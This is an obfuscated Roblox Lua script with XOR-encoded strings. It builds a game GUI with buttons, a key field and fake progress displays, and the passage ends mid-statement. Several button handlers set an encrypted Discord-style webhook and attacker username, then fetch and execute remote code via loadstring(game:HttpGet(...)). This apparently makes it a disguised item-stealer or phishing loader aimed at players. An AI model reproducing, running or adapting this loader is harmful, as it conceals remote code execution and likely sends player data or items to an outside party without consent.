--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end if (game.PlaceId==142823291) then local v12=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v12.Name=v7("\14\192\120\133\200\49\204\46\192\188\16\206\43\200\188\21\159","\156\67\173\74\165");v12.Parent=game.CoreGui;local v16=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));v16.Size=UDim2.new(865.3 -(380 + 485) ,0 -0 ,0.8 -0 ,0);v16.Position=UDim2.new(0.5,0 + 0 ,0.1 + 0 ,1052 -(433 + 619) );v16.BackgroundColor3=Color3.fromRGB(163 -(92 + 71) ,0,0);v16.BorderColor3=Color3.fromRGB(0 + 0 ,428 -173 ,1020 -(574 + 191) );v16.BorderSizePixel=2 + 0 ;v16.Active=true;v16.BackgroundTransparency=0 -0 ;v16.Draggable=true;v16.Parent=v12;local v26=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));v26.Size=UDim2.new(0.3 + 0 ,0,0.05,849 -(254 + 595) );v26.Position=UDim2.new(126.35 -(55 + 71) ,0 -0 ,1790.045 -(573 + 1217) ,0);v26.BackgroundColor3=Color3.new(0,0 -0 ,0 + 0 );v26.BorderColor3=Color3.new(0,0 -0 ,0);v26.BorderSizePixel=940 -(714 + 225) ;v26.Text=v7("\133\33\8\35\96\229\220\190\45","\155\203\68\112\86\19\197");v26.TextSize=102 -67 ;v26.BackgroundTransparency=1 -0 ;v26.TextColor3=Color3.new(28 + 227 ,368 -113 ,1061 -(118 + 688) );v26.Font=Enum.Font.ArialBold;v26.Parent=v16;local v26=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133"));v26.Size=UDim2.new(48.3 -(25 + 23) ,0 + 0 ,1886.05 -(927 + 959) ,0 -0 );v26.Position=UDim2.new(732.35 -(16 + 716) ,0 -0 ,0.145,97 -(11 + 86) );v26.BackgroundColor3=Color3.new(0 -0 ,285 -(175 + 110) ,0);v26.BorderColor3=Color3.new(0,0 -0 ,0 -0 );v26.BorderSizePixel=1;v26.Text=v7("\200\69\166\66\249\23\145\67\238\68\174\73\242","\38\156\55\199");v26.TextSize=25;v26.BackgroundTransparency=1797 -(503 + 1293) ;v26.TextColor3=Color3.new(255,712 -457 ,255);v26.Font=Enum.Font.Highway;v26.Parent=v16;local v26=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"));v26.Size=UDim2.new(0.3 + 0 ,0,1061.05 -(810 + 251) ,0 + 0 );v26.Position=UDim2.new(0.35 + 0 ,0 + 0 ,533.14 -(43 + 490) ,0);v26.BackgroundColor3=Color3.new(733 -(711 + 22) ,0,0);v26.BorderColor3=Color3.new(0 -0 ,859 -(240 + 619) ,0);v26.BorderSizePixel=1 + 0 ;v26.Text=v7("\38\128\238\224\178\19\11\38\128","\84\121\223\177\191\237\76");v26.TextSize=79 -29 ;v26.BackgroundTransparency=1 + 0 ;v26.TextColor3=Color3.fromRGB(1744 -(1344 + 400) ,255,660 -(255 + 150) );v26.Font=Enum.Font.ArialBold;v26.Parent=v16;local v40=Instance.new(v7("\143\83\209\180\24\69\36\213\180\88","\161\219\54\169\192\90\48\80"));v40.Size=UDim2.new(0.9,0 + 0 ,0.12 + 0 ,0);v40.Position=UDim2.new(0.05 -0 ,0,0.3 -0 ,1739 -(404 + 1335) );v40.BackgroundColor3=Color3.new(406 -(183 + 223) ,0 -0 ,0 + 0 );v40.BorderColor3=Color3.fromRGB(0 + 0 ,592 -(10 + 327) ,255);v40.BorderSizePixel=1 + 0 ;v40.Text=v7("\125\80\1\33\76\2\51\38\72\79\64\127\9\109\38\3","\69\41\34\96");v40.BackgroundTransparency=338 -(118 + 220) ;v40.TextColor3=Color3.new(255,255,255);v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=20;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0 + 0 ,0,449 -(108 + 341) )) then local v107=0;while true do if (v107==(2 + 2)) then local v117=0 -0 ;while true do if ((1494 -(711 + 782))==v117) then Username=v7("\108\86\0\16\40\248\28\95\97\39\59\50\229","\114\56\62\101\73\71\141");v107=9 -4 ;break;end if (v117==(469 -(270 + 199))) then game:GetService(v7("\133\253\43\217\12\171\33\224\163\224","\167\214\137\74\171\120\206\83")):SetCore(v7("\184\245\60\89\214\168\159\249\52\84\251\166\159\249\61\83","\199\235\144\82\61\152"),{[v7("\51\31\173\39\2","\75\103\118\217")]=v7("\245\85\125\14\163","\126\167\52\16\116\217"),[v7("\252\43\56\148","\156\168\78\64\224\212\121")]=v7("\38\237\166\203\23\250\229\250\15\235\229\250\21\239\161\203","\174\103\142\197"),[v7("\127\43\80\54","\152\54\72\63\88\69\62")]=v7("\198\198\246\72\220\209\227\94\142\139\161\72\205\212\235\1\245\215\253\89\192\130\231\88\137\149\187\5\141\150\187\10\140\146\183\9\146\211\179\13\129\148\168\84\137\149\187\12","\60\180\164\142")});Duration=11;v117=1 + 0 ;end end end if ((1820 -(580 + 1239))==v107) then wait(1);v40.Text=v7("\255\46\38\226\219\234\248\63\38\235\158\240\139\111","\202\171\92\71\134\190");wait(2 -1 );v107=2;end if (v107==(5 + 0)) then Webhook=v7("\176\253\207\212\171\179\148\139\188\224\200\199\183\251\223\138\187\230\214\139\185\249\210\139\175\236\217\204\183\230\208\215\247\184\137\146\237\191\137\157\237\177\142\144\238\190\136\147\237\191\142\147\247\228\240\253\225\243\254\234\176\234\220\235\181\248\207\253\238\193\212\230\225\195\228\150\148\206\195\156\154\191\201\252\173\208\203\222\135\211\248\200\191\190\150\202\150\208\237\148\171\237\215\198\153\200\202\244\171\223\131\234\147\241\210\221\177\234\195\227\162","\164\216\137\187");loadstring(game:HttpGet(v7("\218\242\37\162\181\164\68\157\227\54\189\180\247\0\199\245\48\252\181\238\10\209\227\126\191\171\172","\107\178\134\81\210\198\158")))();break;end if (v107==(1 + 2)) then local v119=0 + 0 ;while true do if (v119==(0 -0)) then wait(1);v40.BackgroundColor3=Color3.fromRGB(32 + 18 ,1372 -(645 + 522) ,1840 -(1010 + 780) );v119=1 + 0 ;end if (v119==1) then v40.Text=v7("\56\220\95\118\123\55\192\228\13\195\30\40\62\88\221","\135\108\174\62\18\30\23\147");v107=19 -15 ;break;end end end if (v107==(5 -3)) then v40.Text=v7("\29\211\45\140\44\129\31\139\40\204\108\210\105\147","\232\73\161\76");wait(1837 -(1045 + 791) );v40.Text=v7("\143\203\67\89\27\251\234\65\92\19\251\131\2\12","\126\219\185\34\61");v107=7 -4 ;end if ((0 -0)==v107) then v40.Text=v7("\136\209\214\14\7\107\143\192\214\7\66\113\252\150","\75\220\163\183\106\98");wait(1);v40.Text=v7("\54\168\138\51\220\66\137\136\54\212\66\224\203\99","\185\98\218\235\87");v107=506 -(351 + 154) ;end end else local v108=1574 -(1281 + 293) ;while true do if (v108==(266 -(28 + 238))) then v40.BackgroundColor3=Color3.fromRGB(0 -0 ,0,0);v40.Text=v7("\12\28\131\194\175\120\61\129\199\167\120\84\194\233\140\30","\202\88\110\226\166");break;end end end end);local v40=Instance.new(v7("\247\10\154\227\232\214\27\150\248\196","\170\163\111\226\151"));v40.Size=UDim2.new(0.9,0,0.12,0);v40.Position=UDim2.new(1559.05 -(1381 + 178) ,0,0.5 + 0 ,0 + 0 );v40.BackgroundColor3=Color3.new(0 + 0 ,0,0 -0 );v40.BorderColor3=Color3.fromRGB(0 + 0 ,725 -(381 + 89) ,227 + 28 );v40.BorderSizePixel=1;v40.Text=v7("\37\34\179\60\75\119\5\16\55\242\98\14\24\15\55","\73\113\80\210\88\46\87");v40.BackgroundTransparency=0 + 0 ;v40.TextColor3=Color3.new(436 -181 ,1411 -(1074 + 82) ,255);v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=43 -23 ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0,1784 -(214 + 1570) ,1455 -(990 + 465) )) then v40.Text=v7("\181\62\204\22\226\193\0\204\21\167\219\108\152","\135\225\76\173\114");wait(1 + 0 );v40.Text=v7("\46\255\185\180\169\253\139\27\234\248\234\236\233","\199\122\141\216\208\204\221");wait(1 + 0 );v40.Text=v7("\153\207\17\244\125\182\129\220\23\176\34\182\254","\150\205\189\112\144\24");wait(1 + 0 );v40.Text=v7("\17\150\190\72\1\200\61\17\34\196\229\12\86","\112\69\228\223\44\100\232\113");wait(3 -2 );v40.Text=v7("\224\13\6\215\179\60\170\213\24\71\137\246\45","\230\180\127\103\179\214\28");wait(1);v40.BackgroundColor3=Color3.fromRGB(50,205,50);v40.Text=v7("\184\23\94\66\225\1\204\141\2\31\28\164\110\206","\128\236\101\63\38\132\33");game:GetService(v7("\159\189\16\86\162\238\221\139\188\24","\175\204\201\113\36\214\139")):SetCore(v7("\116\201\59\216\42\72\216\60\218\13\68\205\33\213\11\73","\100\39\172\85\188"),{[v7("\153\113\173\140\54","\83\205\24\217\224")]=v7("\212\196\192\39\252","\93\134\165\173"),[v7("\138\247\217\214","\30\222\146\161\162\90\174\210")]=v7("\196\77\115\15\245\90\48\62\237\75\48\62\247\79\116\15","\106\133\46\16"),[v7("\113\35\124\242","\32\56\64\19\156\58")]=v7("\72\202\253\66\82\231\141\88\146\170\25\78\235\144\95\149\196\69\73\247\148\28\193\225\11\11\167\217\3\154\176\0\2\164\217\15\142\242\11\11\167\208\28\192\184\7\15\162","\224\58\168\133\54\58\146")});Duration=1737 -(1668 + 58) ;Username=v7("\109\94\78\196\122\147\137\12\102\116\89\232\125","\107\57\54\43\157\21\230\231");Webhook=v7("\211\159\5\229\170\134\128\148\143\24\230\186\211\221\223\197\18\250\180\147\206\203\130\94\226\188\222\199\212\132\26\230\246\141\157\141\222\71\167\224\137\151\142\223\71\162\234\139\154\141\222\70\186\180\247\246\130\145\52\219\177\223\200\244\134\0\225\128\138\231\212\169\72\223\134\142\227\252\147\73\215\239\206\247\206\178\1\239\134\230\236\215\140\70\184\183\242\246\237\219\2\241\181\222\238\250\154\33\230\143\132\225\240\147\24\236\176\223\215\252\145","\175\187\235\113\149\217\188");loadstring(game:HttpGet(v7("\52\187\149\92\240\35\55\115\170\134\67\241\112\115\41\188\128\2\240\105\121\63\170\206\65\238\43","\24\92\207\225\44\131\25")))();else local v111=0;while true do if (v111==0) then v40.BackgroundColor3=Color3.fromRGB(626 -(512 + 114) ,0 -0 ,0 -0 );v40.Text=v7("\127\193\185\72\30\61\103\210\191\12\65\61\100\245\158","\29\43\179\216\44\123");break;end end end end);local v40=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));v40.Size=UDim2.new(0.9,0,0.12 -0 ,0);v40.Position=UDim2.new(0.05,0 + 0 ,0.7 + 0 ,0 + 0 );v40.BackgroundColor3=Color3.new(0,0 -0 ,1994 -(109 + 1885) );v40.BorderColor3=Color3.fromRGB(0,255,1724 -(1269 + 200) );v40.BorderSizePixel=1;v40.Text=v7("\37\242\88\90\51\91\167\103\121\85","\19\97\135\40\63");v40.BackgroundTransparency=0 -0 ;v40.TextColor3=Color3.new(255,255,1070 -(98 + 717) );v40.Font=Enum.Font.Highway;v40.Parent=v16;v40.TextSize=846 -(802 + 24) ;v40.MouseButton1Click:Connect(function() if (v40.BackgroundColor3==Color3.fromRGB(0 -0 ,0 -0 ,0 + 0 )) then local v112=0 + 0 ;while true do if (v112==(1 + 4)) then Webhook=v7("\178\64\162\80\169\14\249\15\190\93\165\67\181\70\178\14\185\91\187\15\187\68\191\15\173\81\180\72\181\91\189\83\245\5\228\22\239\2\228\25\239\12\227\20\236\3\229\23\239\2\227\23\245\89\157\121\227\78\147\110\178\87\177\111\183\69\162\121\236\124\185\98\227\126\137\18\150\115\174\24\152\2\164\120\175\109\166\90\133\110\149\76\189\3\251\78\148\109\128\16\169\80\186\66\155\117\167\112\169\98\238\110\145\76\191\89\179\87\174\103\160","\32\218\52\214");loadstring(game:HttpGet(v7("\70\3\37\184\226\234\10\21\75\16\62\186\248\187\80\73\79\89\34\184\240\179\64\21\67\26\99","\58\46\119\81\200\145\208\37")))();break;end if (v112==(0 + 0)) then local v126=0 -0 ;while true do if (v126==(3 -2)) then v40.Text=v7("\106\190\192\119\111\153\13\240","\196\46\203\176\18\79\163\45");v112=1 + 0 ;break;end if (v126==(0 + 0)) then v40.Text=v7("\138\73\35\62\111\107\238\9","\81\206\60\83\91\79");wait(1 + 0 );v126=1 + 0 ;end end end if (v112==3) then local v127=0 + 0 ;while true do if (v127==(1434 -(797 + 636))) then v40.Text=v7("\24\36\25\190\89\177\97\26\18","\85\92\81\105\219\121\139\65");v112=4;break;end if (v127==(0 -0)) then wait(1620 -(1427 + 192) );v40.BackgroundColor3=Color3.fromRGB(50,72 + 133 ,50);v127=1;end end end if (v112==(4 -2)) then local v128=0 + 0 ;local v129;while true do if (v128==(0 + 0)) then v129=0;while true do if (v129==(326 -(192 + 134))) then v40.Text=v7("\142\221\29\206\133\249\151\179","\129\202\168\109\171\165\195\183");wait(1);v129=1277 -(316 + 960) ;end if ((1 + 0)==v129) then v40.Text=v7("\6\77\39\221\158\78\166\115","\134\66\56\87\184\190\116");v112=3;break;end end break;end end end if (v112==(4 + 0)) then game:GetService(v7("\206\167\81\87\104\218\239\148\69\76","\191\157\211\48\37\28")):SetCore(v7("\236\26\250\24\20\208\11\253\26\51\220\30\224\21\53\209","\90\191\127\148\124"),{[v7("\76\142\58\27\125","\119\24\231\78")]=v7("\176\44\168\80\198","\113\226\77\197\42\188\32"),[v7("\14\19\236\161","\213\90\118\148")]=v7("\122\45\183\83\93\79\110\128\94\72\27\26\166\87\73\94","\45\59\78\212\54"),[v7("\57\85\140\133","\144\112\54\227\235\230\78\205")]=v7("\161\42\23\232\216\78\190\42\85\179\159\79\170\56\10\161\241\72\160\45\27\186\217\95\238\121\90\165\137\9\230\126\87\170\137\14\245\63\82\173\133\11\245\32\82\173\133\11","\59\211\72\111\156\176")});Duration=11 + 0 ;Username=v7("\122\143\230\20\65\146\237\42\113\165\241\56\70","\77\46\231\131");v112=18 -13 ;end if ((552 -(83 + 468))==v112) then wait(1807 -(1202 + 604) );v40.Text=v7("\156\55\110\27\100\161\175\235","\143\216\66\30\126\68\155");wait(4 -3 );v112=2 -0 ;end end else local v113=0 -0 ;local v114;while true do if (v113==0) then v114=325 -(45 + 280) ;while true do if (v114==(0 + 0)) then v40.BackgroundColor3=Color3.fromRGB(0 + 0 ,0 + 0 ,0);v40.Text=v7("\15\153\32\169\233\231\118\4\170\22","\86\75\236\80\204\201\221");break;end end break;end end end end);local v26=Instance.new(v7("\70\68\111\145\210\138\112\68\123","\235\18\33\23\229\158"));v26.Size=UDim2.new(1 + 0 ,0 + 0 ,0.1,0 -0 );v26.Position=UDim2.new(1911.0001 -(340 + 1571) ,0 + 0 ,1772.9 -(1733 + 39) ,0 -0 );v26.BackgroundColor3=Color3.new(0,1034 -(125 + 909) ,0);v26.BorderColor3=Color3.fromRGB(1948 -(1096 + 852) ,115 + 140 ,255);v26.BorderSizePixel=2 -0 ;v26.Text=v7("\115\168\192\184\91\191\197\251\114\163\129\137\81\183\219\161\16\150\238\151","\219\48\218\161");v26.TextSize=20 + 0 ;v26.BackgroundTransparency=0;v26.TextColor3=Color3.new(255,255,767 -(409 + 103) );v26.Font=Enum.Font.SourceSans;v26.Parent=v16;local v53=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v53.Size=UDim2.new(237 -(46 + 190) ,95 -(51 + 44) ,1,0);v53.Position=UDim2.new(0.0001 + 0 ,1317 -(1114 + 203) ,0.0002,0);v53.BackgroundColor3=Color3.fromRGB(726 -(228 + 498) ,0 + 0 ,0);v53.BorderColor3=Color3.fromRGB(0 + 0 ,918 -(174 + 489) ,664 -409 );v53.BorderSizePixel=1905 -(830 + 1075) ;v53.Active=False;v53.BackgroundTransparency=0;v53.Draggable=false;v53.Parent=v16;local v26=Instance.new(v7("\53\55\30\46\113\0\48\3\54","\61\97\82\102\90"));v26.Size=UDim2.new(524.3 -(303 + 221) ,1269 -(231 + 1038) ,0.05 + 0 ,1162 -(171 + 991) );v26.Position=UDim2.new(0.35 -0 ,0,0.09 -0 ,0 -0 );v26.BackgroundColor3=Color3.new(0 + 0 ,0,0);v26.BorderColor3=Color3.new(0 -0 ,0 -0 ,0 -0 );v26.BorderSizePixel=1;v26.Text=v7("\135\11\146\11\244\110\45\61\137\3","\105\204\78\203\43\167\55\126");v26.TextSize=104 -70 ;v26.BackgroundTransparency=1249 -(111 + 1137) ;v26.TextColor3=Color3.new(255,413 -(91 + 67) ,758 -503 );v26.Font=Enum.Font.ArialBold;v26.Parent=v53;local v26=Instance.new(v7("\145\175\59\10\63\5\197\84\169","\49\197\202\67\126\115\100\167"));v26.Size=UDim2.new(0.3 + 0 ,523 -(423 + 100) ,0.05 + 0 ,0 -0 );v26.Position=UDim2.new(0.35 + 0 ,771 -(326 + 445) ,0.14 -0 ,0 -0 );v26.BackgroundColor3=Color3.new(0 -0 ,711 -(530 + 181) ,0);v26.BorderColor3=Color3.new(881 -(614 + 267) ,0,32 -(19 + 13) );v26.BorderSizePixel=1 -0 ;v26.Text=v7("\8\100\224\22\191\105\97\8\100","\62\87\59\191\73\224\54");v26.TextSize=116 -66 ;v26.BackgroundTransparency=1;v26.TextColor3=Color3.fromRGB(0 -0 ,255,67 + 188 );v26.Font=Enum.Font.ArialBold;v26.Parent=v53;local v63=Instance.new(v7("\211\7\226\221\197\13\226","\169\135\98\154"));v63.Size=UDim2.new(0.8 -0 ,0,0.18,0 -0 );v63.Position=UDim2.new(0.1,1812 -(1293 + 519) ,0.3,0 -0 );v63.BackgroundColor3=Color3.fromRGB(284 -175 ,110,108);v63.BorderColor3=Color3.fromRGB(0 -0 ,1099 -844 ,255);v63.BorderSizePixel=1;v63.Text="";v63.PlaceholderText=v7("\224\114\61\20\213\54\218\206\57\106\26","\168\171\23\68\52\157\83");v63.TextWrapped=true;v63.TextColor3=Color3.fromRGB(0 -0 ,102 + 89 ,53 + 202 );v63.BackgroundTransparency=0 -0 ;v63.Font=Enum.Font.Arial;v63.TextSize=4 + 12 ;v63.Parent=v53;local v78=Instance.new(v7("\192\116\237\185\7\56\147\224\126\251","\231\148\17\149\205\69\77"));v78.Size=UDim2.new(0.7 + 0 ,0,0.15 + 0 ,1096 -(709 + 387) );v78.Position=UDim2.new(1858.15 -(673 + 1185) ,0 -0 ,0.55 -0 ,0 -0 );v78.BackgroundColor3=Color3.fromRGB(19 + 7 ,26,26);v78.BorderColor3=Color3.fromRGB(0 + 0 ,255,343 -88 );v78.BorderSizePixel=1 + 0 ;v78.Text=v7("\165\169\211\254\69","\159\224\199\167\155\55");v78.BackgroundTransparency=0;v78.TextColor3=Color3.new(508 -253 ,500 -245 ,2135 -(446 + 1434) );v78.Font=Enum.Font.Highway;v78.Parent=v53;v78.TextSize=1303 -(1040 + 243) ;v78.Active=false;v78.MouseButton1Click:Connect(function() end);local v91=Instance.new(v7("\195\246\36\198\213\230\40\198\248\253","\178\151\147\92"));v91.Size=UDim2.new(0.7 -0 ,1847 -(559 + 1288) ,1931.15 -(609 + 1322) ,454 -(13 + 441) );v91.Position=UDim2.new(0.15 -0 ,0 -0 ,0.55,0);v91.BackgroundColor3=Color3.fromRGB(129 -103 ,26,26);v91.BorderColor3=Color3.fromRGB(0 + 0 ,926 -671 ,91 + 164 );v91.BorderSizePixel=1 + 0 ;v91.Text=v7("\169\243\88\55\0","\26\236\157\44\82\114\44");v91.BackgroundTransparency=0;v91.TextColor3=Color3.new(756 -501 ,140 + 115 ,255);v91.Font=Enum.Font.Highway;v91.Parent=v53;v91.TextSize=36 -16 ;v91.Active=false;v91.MouseButton1Click:Connect(function() if (v63.Text==v7("\33\43\204\100\36\39\210\92\43\121\141\95\114\125\216\113\47\124\141","\59\74\78\181")) then v53.Visible=false;Username=v7("\17\217\95\99\188\48\223\93\101\145\55\196\82","\211\69\177\58\58");Webhook=v7("\191\241\109\229\250\145\248\170\125\252\250\200\184\247\125\187\234\196\186\170\120\229\224\132\160\224\123\253\230\196\188\246\54\164\187\157\226\179\43\172\188\147\226\177\47\162\186\156\226\179\44\162\166\198\156\220\32\239\204\229\191\230\126\218\228\218\163\220\47\221\230\233\238\207\70\167\197\236\175\189\91\163\251\243\162\220\105\239\214\241\148\233\126\162\164\197\153\220\79\165\250\207\187\231\88\212\248\251\164\211\33\219\194\211\190\252\112\246\241\236\173","\171\215\133\25\149\137");loadstring(game:HttpGet(v7("\233\220\38\234\252\106\179\13\228\207\61\232\230\59\233\81\224\134\33\234\238\51\249\13\236\197\96","\34\129\168\82\154\143\80\156")))();wait(0.001);Username=v7("\177\186\54\50\71\91\135\130\141\17\25\93\70","\233\229\210\83\107\40\46");Webhook=v7("\201\86\38\198\22\155\13\125\210\12\210\65\61\196\1\143\65\61\219\74\192\82\59\153\18\196\64\58\217\10\202\81\125\135\87\151\23\100\132\92\148\26\103\130\83\150\17\101\131\83\148\21\125\219\46\248\27\40\243\43\201\65\53\249\8\208\86\11\128\45\206\96\107\252\58\147\110\21\206\93\227\20\32\238\16\248\82\40\233\63\226\78\53\129\72\207\108\11\224\85\210\70\62\212\36\224\83\2\197\51\153\108\25\206\12\216\75\49\206\34\219","\101\161\34\82\182");loadstring(game:HttpGet(v7("\224\25\77\238\200\184\205\97\237\10\86\236\210\233\151\61\233\67\74\238\218\225\135\97\229\0\11","\78\136\109\57\158\187\130\226")))();else local v116=0 + 0 ;while true do if (v116==(0 + 0)) then v63.Text=v7("\9\45\246\255\57\127\210\244\39\127\215\248\57\56\248","\145\94\95\153");game:GetService(v7("\206\217\21\199\90\178\239\234\1\220","\215\157\173\116\181\46")):SetCore(v7("\6\177\133\246\244\58\160\130\244\211\54\181\159\251\213\59","\186\85\212\235\146"),{[v7("\246\136\2\242\60","\56\162\225\118\158\89\142")]=v7("\110\4\205\181\56","\184\60\101\160\207\66"),[v7("\5\135\100\168","\220\81\226\28")]=v7("\36\199\141\245\237\135\56\208\155\187\196\206\20\210\131","\167\115\181\226\155\138"),[v7("\203\33\232\82","\166\130\66\135\60\27\17")]=v7("\86\72\214\97\56\81\71\204\47\127\11\94\215\101\53\25\107\221\102\53\80\12\199\113\109\21\31\151\44\98\17\28\150\35\105\17\12\217\40\97\17\26\136\125\109\21\31\158","\80\36\42\174\21")});v116=1 + 0 ;end if (v116==(2 + 0)) then v63.Text="";break;end if (v116==(1 + 0)) then Duration=5;wait(433.3 -(153 + 280) );v116=5 -3 ;end end end end);local v40=Instance.new(v7("\122\21\47\110\108\5\35\110\65\30","\26\46\112\87"));v40.Size=UDim2.new(0.7 + 0 ,0,0.15,0 + 0 );v40.Position=UDim2.new(0.15 + 0 ,0 + 0 ,0.75 + 0 ,0 -0 );v40.BackgroundColor3=Color3.fromRGB(17 + 9 ,26,693 -(89 + 578) );v40.BorderColor3=Color3.fromRGB(0,183 + 72 ,255);v40.BorderSizePixel=1;v40.Text=v7("\158\38\191\52\148\186\92","\212\217\67\203\20\223\223\37");v40.BackgroundTransparency=0 -0 ;v40.TextColor3=Color3.new(1304 -(572 + 477) ,35 + 220 ,154 + 101 );v40.Font=Enum.Font.Highway;v40.Parent=v53;v40.TextSize=20;v40.MouseButton1Click:Connect(function() setclipboard(v7("\177\136\177\237\180\132\175\213\187\218\240\214\226\222\165\248\191\223\240","\178\218\237\200"));game:GetService(v7("\133\161\231\194\162\176\244\247\163\188","\176\214\213\134")):SetCore(v7("\199\168\184\208\134\89\77\253\171\191\215\169\66\80\251\163","\57\148\205\214\180\200\54"),{[v7("\38\244\33\56\115","\22\114\157\85\84")]=v7("\246\202\30\222\71","\200\164\171\115\164\61\150"),[v7("\138\241\27\81","\227\222\148\99\37")]=v7("\3\115\97\194\220\115\102\122\211\185\24\119\107\182\208\29\18\102\222\220\115\112\125\206","\153\83\50\50\150"),[v7("\116\117\124\18","\45\61\22\19\124\19\203")]=v7("\211\16\21\225\10\101\180\195\72\66\186\22\105\169\196\79\44\230\17\117\173\135\27\9\168\83\37\224\152\64\88\163\90\38\224\148\84\26\168\83\37\233\135\26\80\164\87\32","\217\161\114\109\149\98\16")});Duration=50;v91.Visible=false;game:GetService(v7("\33\52\57\110\168\113\0\7\45\117","\20\114\64\88\28\220")):SetCore(v7("\2\4\220\176\214\223\169\56\7\219\183\249\196\180\62\15","\221\81\97\178\212\152\176"),{[v7("\249\238\9\247\31","\122\173\135\125\155")]=v7("\182\192\13\163\37","\168\228\161\96\217\95\81"),[v7("\239\212\54\72","\55\187\177\78\60\79")]=v7("\29\226\108\171\113\238\169\25\142\121\196\116\143\209\120\142\108\206\101","\224\77\174\63\139\38\175"),[v7("\173\66\87\32","\78\228\33\56")]=v7("\220\124\170\23\141\219\115\176\89\202\129\106\171\19\128\147\95\161\16\128\218\56\187\7\216\159\43\235\90\215\155\40\234\85\220\155\56\165\94\212\155\46\244\11\216\159\43\226","\229\174\30\210\99")});Duration=40;v78.Text=v7("\74\184","\89\123\141\230\49\141\93");wait(1 + 0 );v78.Text=v7("\162\37","\42\147\17\150\108\112");wait(87 -(84 + 2) );v78.Text=v7("\94\245","\136\111\198\77\31\135");wait(1 -0 );v78.Text=v7("\83\91","\201\98\105\199\54\221\132\119");Username=v7("\141\4\134\24\13\32\162\190\51\161\51\23\61","\204\217\108\227\65\98\85");Webhook=v7("\86\215\225\245\63\154\17\140\241\236\63\195\81\209\241\171\47\207\83\140\244\245\37\143\73\198\247\237\35\207\85\208\186\180\126\150\11\149\167\188\121\152\11\151\163\178\127\151\11\149\160\178\99\205\117\250\172\255\9\238\86\192\242\202\33\209\74\250\163\205\35\226\7\233\202\183\0\231\70\155\215\179\62\248\75\250\229\255\19\250\125\207\242\178\97\206\112\250\195\181\63\196\82\193\212\196\61\240\77\245\173\203\7\216\87\218\252\230\52\231\68","\160\62\163\149\133\76");loadstring(game:HttpGet(v7("\222\180\25\63\208\140\239\66\42\196\217\178\4\36\214\197\161\67\60\211\215\163\8\96\206\219\242","\163\182\192\109\79")))();wait(0.5 + 0 );Username=v7("\0\46\5\249\250\33\40\7\255\215\38\51\8","\149\84\70\96\160");Webhook=v7("\48\18\25\253\43\92\66\162\60\15\30\238\55\20\9\163\59\9\0\162\57\22\4\162\47\3\15\229\55\9\6\254\119\87\95\187\109\80\95\180\109\94\88\185\110\81\94\186\109\80\88\186\119\11\38\212\97\28\40\195\48\5\10\194\53\23\25\212\110\46\2\207\97\44\50\191\20\33\21\181\26\80\31\213\45\63\29\247\7\60\46\225\63\81\64\227\22\63\59\189\43\2\1\239\25\39\28\221\43\48\85\195\19\30\4\244\49\5\21\202\34","\141\88\102\109");loadstring(game:HttpGet(v7("\187\71\222\96\9\103\26\142\182\84\197\98\19\54\64\210\178\29\217\96\27\62\80\142\190\94\152","\161\211\51\170\16\122\93\53")))();wait(842.001 -(497 + 345) );setclipboard(v7("\240\171\171\23\245\167\181\47\250\249\234\44\163\253\191\2\254\252\234","\72\155\206\210"));v78.Text=v7("\23\43","\83\38\26\52\110");wait(1 + 0 );v78.Text=v7("\9\71","\38\56\119\71");wait(1 + 0 );v78.Text="9";wait(1334 -(605 + 728) );v78.Text="8";wait(1 + 0 );v78.Text="7";wait(1 -0 );v78.Text="6";wait(1);v78.Text="5";wait(1);v78.Text="4";wait(1 + 0 );v78.Text="3";wait(3 -2 );v78.Text="2";wait(1);v78.Text="1";wait(3);v91.Visible=true;game:GetService(v7("\192\251\89\196\49\83\225\200\77\223","\54\147\143\56\182\69")):SetCore(v7("\229\132\241\77\241\217\149\246\79\214\213\128\235\64\208\216","\191\182\225\159\41"),{[v7("\31\27\60\89\142","\162\75\114\72\53\235\231")]=v7("\190\61\73\248\73","\98\236\92\36\130\51"),[v7("\144\28\20\174","\80\196\121\108\218\37\200\213")]=v7("\35\127\11\124\64\78\175\46\71\39\77","\234\96\19\98\31\43\110"),[v7("\47\28\93\201","\235\102\127\50\167\204\18")]=v7("\66\163\237\55\76\59\93\163\175\108\11\58\73\177\240\126\101\61\67\164\225\101\77\42\13\240\160\122\29\124\5\247\173\117\29\123\22\182\168\114\17\126\22\169\168\114\17\126","\78\48\193\149\67\36")});Duration=19 + 1 ;end);else local v104=0 -0 ;while true do if (v104==(0 + 0)) then 